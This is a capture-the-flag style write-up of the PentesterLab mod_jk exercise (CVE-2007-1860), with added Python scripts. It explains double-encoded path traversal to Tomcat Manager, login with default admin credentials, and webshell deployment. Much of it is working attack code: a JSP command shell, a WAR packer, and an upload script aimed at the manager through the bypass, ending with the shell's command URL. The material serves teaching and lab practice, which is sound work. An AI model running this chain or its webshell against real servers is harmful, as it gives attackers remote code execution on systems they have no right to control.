By means of these seven considerations I can forecast victory or defeat. —– The Art of War
This course details the exploitation of a vulnerability in mod_jk and how by using this issue it is possible to access the administration interface of a Tomcat server (Tomcat’s manager). Then using this access, we will see how an attacker can use default credentials to log in as administrator and use this access to gain code execution on the server. —Pentesterlab
Detail Assessment and Planning
- Port scan to identify open ports, the services running on them and their versions. — Nmap
- Check the HTTP response headers. — nc
- Exploit the double-decoding issue and upload a webshell. — Firebug
Weaknesses and Strengths
I used Nmap to identify open ports: TCP port 80 is open and an Apache service is listening on it.
Checking the HTTP response headers with nc also reveals the Apache version.
First of all, we need to understand how Apache and Tomcat are arranged here: Apache sits in front and forwards only certain paths to Tomcat through mod_jk. Everything else is answered by Apache itself.
If we request a page that does not exist, we get a 404 page like this:
This is Apache's own 404 page, so the request was handled by Apache and never forwarded to Tomcat.
If we request a page such as 192.168.79.168/examples/jsp/test404, we get a different 404 page:
This one is Tomcat's error page, so requests to this path are forwarded by Apache to Tomcat. That tells us which part of the URL space reaches Tomcat.
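The two 404 pages are the fingerprint that decides which paths are worth attacking. The following is an added example, not code from the PentesterLab course or from the original post; the two sample bodies are constructed to mimic the default Apache httpd and Tomcat error pages (version strings are assumptions), and `probe()` only matters against a live target.

```python
"""Added example: tell an Apache httpd 404 from a Tomcat 404 behind mod_jk."""
import re
import urllib.error
import urllib.request

# Constructed sample: Apache httpd's default "Not Found" page (version string assumed).
APACHE_404 = """<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /test404 was not found on this server.</p>
<hr>
<address>Apache/2.2.3 (Debian) Server at 192.168.79.168 Port 80</address>
</body></html>
"""

# Constructed sample: Tomcat's default error report page (version string assumed),
# i.e. what comes back for an unknown path that mod_jk did forward to Tomcat.
TOMCAT_404 = """<html><head><title>Apache Tomcat/5.5 - Error report</title></head>
<body><h1>HTTP Status 404 - /examples/jsp/test404</h1>
<p><b>type</b> Status report</p><p><b>message</b> <u>/examples/jsp/test404</u></p>
<p><b>description</b> <u>The requested resource (/examples/jsp/test404) is not available.</u></p>
<h3>Apache Tomcat/5.5</h3></body></html>
"""


def classify_404(body):
    """Return 'tomcat', 'apache' or 'unknown' from the markers in the error page.

    Tomcat's error report carries "HTTP Status 404" and an
    "Apache Tomcat/<version> - Error report" title; httpd's page says
    "The requested URL ... was not found on this server." Tomcat is tested
    first because its page contains the word "Apache" as well.
    """
    if re.search(r"HTTP Status 404|Apache Tomcat/[\d.]* - Error report", body):
        return "tomcat"
    if "was not found on this server" in body:
        return "apache"
    return "unknown"


def is_forwarded(body):
    """A Tomcat-generated 404 proves the path is mounted in mod_jk: requests
    under it reach Tomcat and are candidates for the double-decoding trick."""
    return classify_404(body) == "tomcat"


def probe(url, timeout=5.0):
    """Fetch url from a live target and classify the 404 page it returns."""
    try:
        urllib.request.urlopen(url, timeout=timeout)
    except urllib.error.HTTPError as e:
        if e.code == 404:
            return classify_404(e.read().decode("utf-8", "replace"))
        return "unknown"
    return "not-a-404"


if __name__ == "__main__":
    for path, body in (("/test404", APACHE_404), ("/examples/jsp/test404", TOMCAT_404)):
        print(f"{path}: 404 generated by {classify_404(body)}, forwarded={is_forwarded(body)}")
```

Running it against the lab would be `probe("http://192.168.79.168/examples/jsp/test404")`; anything that classifies as `tomcat` is a prefix that mod_jk forwards.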
Tomcat Manager is available at the URI /manager/html and is, most of the time, protected by a password. The CVE-2007-1860 vulnerability is described in the advisory and works as follows.
If you send %252e to a vulnerable mod_jk, Apache performs a first decoding and forwards the value %2e to Tomcat. Tomcat then performs a second decoding and ends up with a single dot (.). With %252e%252e you can therefore get .. into Tomcat. If you send .. to Apache directly, Apache collapses it itself and will not forward the request to Tomcat unless the resulting path is one configured to be forwarded to Tomcat (using
Now we know how to reach /manager/html: request it through a forwarded path with the dots double-encoded, using one %252e%252e/ segment per directory level you have to climb, so you may need to repeat %252e%252e/ several times.
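The following model of the two decoding steps is an added example, not code from the PentesterLab course or the original post. It assumes that /examples/* is the only prefix mod_jk forwards and that /examples/jsp/ is the forwarded location used in the exercise (both taken from the URLs above, not stated on the page), and it models Tomcat's refusal of a ".." that climbs above the root as the author of this example understands Tomcat's normalisation. It shows why a literal or single-encoded .. stops at Apache, why the double-encoded form reaches the manager, why the number of %252e%252e/ segments has to match the depth, and what the fixed mod_jk (forwarding the undecoded request line) changes.

```python
"""Added example: simulate CVE-2007-1860's double decoding across Apache/mod_jk and Tomcat."""
from urllib.parse import unquote

MOUNT_PREFIX = "/examples/"   # assumption: the only prefix JkMount forwards to Tomcat


def normalize(path):
    """Collapse '.' and '..' segments like a web server or servlet container.
    Returns None when '..' would climb above the root (Tomcat rejects that)."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None
            out.pop()
        else:
            out.append(seg)
    return "/" + "/".join(out)


def apache_side(request_path, patched_modjk=False):
    """Apache httpd with mod_jk. Returns the path handed to Tomcat, or None
    when httpd keeps the request and answers with its own 404 page.

    httpd decodes once and normalises. A literal or single-encoded ".." is
    collapsed here, the result no longer starts with the mounted prefix, and
    nothing is forwarded. A double-encoded "%252e" only becomes "%2e", which
    is not a dot yet, so the prefix still matches and the request goes through.
    """
    once = normalize(unquote(request_path))
    if once is None or not once.startswith(MOUNT_PREFIX):
        return None
    # Vulnerable mod_jk (<= 1.2.22) forwards the decoded URI; the fixed one
    # forwards the original request line, so Tomcat decodes only once overall.
    return request_path if patched_modjk else once


def tomcat_side(forwarded):
    """Tomcat URL-decodes what it receives, then normalises the result."""
    return normalize(unquote(forwarded))


def resolve(request_path, patched_modjk=False):
    """Path Tomcat ends up serving for a request, or None if Tomcat never sees it."""
    fwd = apache_side(request_path, patched_modjk)
    return None if fwd is None else tomcat_side(fwd)


def bypass_path(target, base="/examples/jsp/"):
    """Build a request under `base` (a forwarded location) that Tomcat resolves
    to `target`: one "%252e%252e/" per directory level between base and "/".
    Too few leaves you inside the mounted tree; too many climbs past the root
    and Tomcat rejects the request, which is why the count has to match."""
    climb = len([s for s in base.split("/") if s])
    return base + "%252e%252e/" * climb + target.lstrip("/")


if __name__ == "__main__":
    cases = [
        "/examples/jsp/../../manager/html",            # literal: httpd collapses it
        "/examples/jsp/%2e%2e/%2e%2e/manager/html",    # single-encoded: same result
        bypass_path("/manager/html"),                  # double-encoded: reaches Tomcat
        "/examples/jsp/%252e%252e/%252e%252e/%252e%252e/manager/html",  # one segment too many
    ]
    for p in cases:
        print(f"{p}\n  vulnerable mod_jk -> {resolve(p)}\n  patched mod_jk    -> {resolve(p, True)}")
```

With the patched mod_jk the same request still reaches Tomcat, but Tomcat sees the literal segment %2e%2e inside /examples/jsp/ and answers with its own 404 instead of serving the manager.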
The credentials are one of the default ones. In this exercise the admin did not change them: the user name is admin and the password is empty. With those we get access to the Tomcat Manager.
Now we need to create a webshell and upload it to Tomcat.
Deploy a webshell
The webshell (from PentesterLab; you may also generate one with msfvenom):
Now we have to pack the webshell into a WAR file:
webshell.war is ready to fire.
We can use the manager's form to upload the WAR file:
However, submitting it returns a 404 page, because the form's action URL (the deployment URL) does not use the double-encoding trick that got us into the manager, so Apache answers it instead of forwarding it to Tomcat. We therefore use Firebug to rewrite the form's action to the right location.
Change the form action to:
After a successful upload, the webshell application is listed in the Tomcat Manager:
Now enjoy the webshell by accessing
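Packing the WAR, the rewritten upload and the final call to the shell can be scripted instead of edited by hand in Firebug. The block below is an added example, not code from the PentesterLab course or the original post, and it rests on assumptions the page does not state: that the manager's upload form posts a multipart field named deployWar to /manager/html/upload, that the manager and the deployed /webshell/ context are both reached through the double-encoded /examples/jsp/ prefix (because only that prefix is forwarded by mod_jk), and that the default credentials are admin with an empty password. The JSP shell is constructed for this example; any file-based webshell would do.

```python
"""Added example: build webshell.war in memory and deploy it through Tomcat Manager
via the double-encoded path, then derive the URL of the deployed shell."""
import base64
import io
import urllib.error
import urllib.parse
import urllib.request
import uuid
import zipfile

TARGET = "http://192.168.79.168"                 # lab address from the post
PREFIX = "/examples/jsp/%252e%252e/%252e%252e"   # assumption: double-encoded climb to "/"
USERNAME, PASSWORD = "admin", ""                 # default credentials from the post

# Constructed minimal JSP command shell: runs the value of ?cmd= and returns its output.
INDEX_JSP = r"""<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%>
"""

# Minimal deployment descriptor so the archive is accepted as a web application.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4"></web-app>
"""


def build_war(jsp_source=INDEX_JSP):
    """Pack index.jsp and WEB-INF/web.xml into a WAR (a zip archive) in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("index.jsp", jsp_source)
        z.writestr("WEB-INF/web.xml", WEB_XML)
    return buf.getvalue()


def war_entries(war):
    """List the archive entries, to check the package before uploading it."""
    with zipfile.ZipFile(io.BytesIO(war)) as z:
        return z.namelist()


def multipart_body(field, filename, data, boundary):
    """Encode one file as multipart/form-data, the way the manager's form does."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def manager_upload_request(war, filename="webshell.war"):
    """Build the POST the manager form would send, but aimed at the double-encoded
    path so Apache forwards it to Tomcat (the form's own action, /manager/html/upload,
    is answered by Apache with a 404). Field name "deployWar" is an assumption."""
    boundary = "----webshell" + uuid.uuid4().hex
    body = multipart_body("deployWar", filename, war, boundary)
    req = urllib.request.Request(TARGET + PREFIX + "/manager/html/upload", data=body, method="POST")
    req.add_header("Content-Type", f"multipart/form-data; boundary={boundary}")
    token = base64.b64encode(f"{USERNAME}:{PASSWORD}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    return req


def shell_url(cmd):
    """URL of the deployed shell; /webshell/ is assumed reachable only through the
    mounted prefix, hence the same double-encoding as for the manager."""
    return TARGET + PREFIX + "/webshell/index.jsp?cmd=" + urllib.parse.quote(cmd)


if __name__ == "__main__":
    war = build_war()
    with open("webshell.war", "wb") as f:      # keep a copy for the manual upload path
        f.write(war)
    print("packed:", war_entries(war))
    try:
        with urllib.request.urlopen(manager_upload_request(war), timeout=10) as resp:
            print("manager answered", resp.status)
    except urllib.error.HTTPError as e:
        print("upload failed:", e.code)
    print("shell:", shell_url("id"))
```

If the upload comes back as a 404, the prefix is wrong for this target (see the decoding walk-through earlier in the post); a 401 means the credentials are not the defaults.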